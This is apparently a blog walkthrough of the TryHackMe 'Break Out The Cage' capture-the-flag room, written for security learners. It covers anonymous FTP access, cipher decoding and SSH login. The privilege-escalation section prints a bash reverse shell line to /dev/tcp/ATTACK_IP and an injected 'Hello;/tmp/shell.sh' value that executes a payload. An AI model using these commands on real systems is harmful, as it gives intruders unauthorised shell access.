Skip to main content
HashnodeREAPSEC

Command Palette

Search for a command to run...

Complete Guide: Break Out The Cage TryHackMe Room Walkthrough

Updated
4 min read
Complete Guide: Break Out The Cage TryHackMe Room Walkthrough
M
MOHIT SINGH PAPOLA
Part of seriesTRY HACK ME WRITEUPS

LINK: https://tryhackme.com/room/breakoutthecage1

RECON/SCANNING

So First We Will Run Nmap/NmapAutomator to scan the target for open ports.

So Here we can see three ports are open lets checkout each port one by one:

  • As you can see Anonymous login is allowed in FTP So lets proceed with that.

So from FTP anonymous login we can see a file name dad_tasks so we will transfer it to our local machine by using get command

Now there is a HTTP web page at port 80 lets check out :

So I searched the Website but couldn’t find anything useful so lets move on to the file we transferred to our local machine.

As you can see the file was ASCII text format so we see its contents using cat command and we can see a base64 encoded string so lets decode it :

So on Decoding Base64 string we get another encoded message so lets check it out by searching which type of encoded ciphertext it is in ciphertext analyzer in dcode.fr website.

So as you can see It identified it as Vigenère Cipher so lets decode this ciphertext :

On decoding the ciphertext we got the password for Weston which is the 1st question.

Since we saw that port 22 for SSH is opened why don’t we try to login as Weston through

SSH LOGIN

do ssh weston@ip and enter the password when prompted.

BOOM !!💥 We logged in as Weston through SSH.

Now Lets enumerate and look for flags and important things, So first I did sudo -l to check if a file has sudo permission or not

As a result we can see there is a file named bees in /usr/bin/bees which has sudo permission but suddenly a message appeared which was indicating towards a user cage

So I searched files owned by this user using

find / -type f -user cage 2>/dev/null

So as a result i got two files in /opt/….. directory so lets cat out their contents one by one

Its content shows it opens another file in same directory so lets cat its content out

Nice!! It has the list of messages that it is showing us time to time that means the above python file is opening this file and sending these messages to us

Let’s check out the files permissions present in /.files directory

As you can see the file has group read-write permission(rw) so when we checked with id command we can see that Weston is a member in the cage user group so Weston has those read-write rights

So we can craft a reverse shell payload and overwrite the file with our payload .

Since /tmp have permission to create files in it we will create our payload there by using these commands :

echo '#!/bin/bash' > /tmp/shell.sh 
echo 'bash -i >& /dev/tcp/ATTACK_IP/4444 0>&1' >> /tmp/shell.sh 
chmod +x /tmp/shell.sh

#dont forget to change the ATTACK_IP with your own local machine IP

Now setup a listener in your local machine

Now trigger the payload to get a reverse shell in your local machine using this command :

printf 'Hello;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/filename

Now wait till you get the above Hello message and then go to your listener and you will see you got a shell as user cage

Getting User Flag

Now First Stabilize this shell from the commands present in the below link

How to stabilize a simple reverse shell to a fully interactive terminal

Now Once we stabilize the shell lets look out for user flag so on listing the files of the current directory which is /home/cage we got email_backup and Super_Duper_Checklist which contain our user flag .

Getting Root Flag

So once we got the user flag lets check out the another directory called email_backup and in that we got a file named as email_3 and its content has password for root user but it was encoded and this time we also got a bold text ‘FACE‘ which is strongly indicating as a key to crack that encoded ciphertext

So yet once again i went to Vigenere decoder in dcode.fr website and you can either

Brute force It With Automatic Decryption

or you can use the key FACE to directly get the password

So We got the root user password so lets su root and get the root flag by going to the root directory , listing out the files and getting the content of email_2 file and you will get the root flag which is the 3rd question answer

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING

#break-out-the-cage#reapsec#tryhackme-walkthrough#tryhackme#blogs#ctf-writeup

TRY HACK ME WRITEUPS

Part 4 of 4

In this series I will give TryHackMe challenges complete walkthroughs step by step in detail.

Start from the beginning

ColddBox: Easy Room on TryHackMe: Complete Walkthrough and Guide

LINK - https://tryhackme.com/room/colddboxeasy OVERVIEW We are given an IP Address Let’s scan it using NMAP ENUMERATION So we have two open ports PORT 80 and PORT 4512 of web and ssh respectivelyAlso we can see the website is running WordPress 4.1...

More from this blog

R

REAPSEC

26 posts

YOU REAP WHAT YOU SOW!!